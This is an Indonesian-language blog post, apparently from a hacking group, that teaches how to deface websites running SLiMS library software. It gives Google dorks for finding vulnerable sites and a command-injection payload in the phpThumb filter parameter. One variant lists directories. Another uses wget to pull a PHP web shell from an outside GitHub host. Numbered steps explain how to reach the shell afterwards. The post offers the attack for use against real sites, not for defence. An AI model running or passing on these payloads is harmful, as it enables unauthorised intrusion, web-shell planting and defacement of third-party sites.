Deface POC Slims Command Injection

Oke guys, kali ini gw bakal share materi tentang bagaimana cara deface Poc Slims Command Injection.

Dork :
- intext:"Powered By SLiMS".
- inurl:index.php?p=show_detail

Exploit :
- /lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlaceline file.jpg jpeg:file.jpg ;ls -la; &phpThumbDebug=9
Untuk menampilkan directory file sekaligus cek vuln.
- /lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlaceline file.jpg jpeg:file.jpg ;wget https://raw.githubusercontent.com/R3l04D337/shell/main/alfa.php; &phpThumbDebug=9
Untuk upload shellnya.

Langkah-langkah :

1. Dorking dulu seperti biasa.

2. Kalau udah dapet target masukkan exploitnya, kalau vuln bakalan muncul directory files nya kek gini :

3. Setelah itu kalian tinggal upload shell : lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlaceline file.jpg jpeg:file.jpg ;wget https://raw.githubusercontent.com/R3l04D337/shell/main/alfa.php; &phpThumbDebug=9

4. Cara akses? https://site.com/lib/watermark/shell.php dan ini hasilnya :

Oke sekian dulu dari gw Wassalam wr wb jangan lupa share.

GSOH OFFICIAL

Deface POC Slims Command Injection

0 Komentar

Popular Posts

Tags

Laporkan Penyalahgunaan

Pages

Something about me

Contact Info

Contact List

Formulir Kontak

GSOH OFFICIAL

Deface POC Slims Command Injection

Anda mungkin menyukai postingan ini

0 Komentar

Popular Posts

Tags

Laporkan Penyalahgunaan

Pages

Something about me

Contact Info

Contact List

Formulir Kontak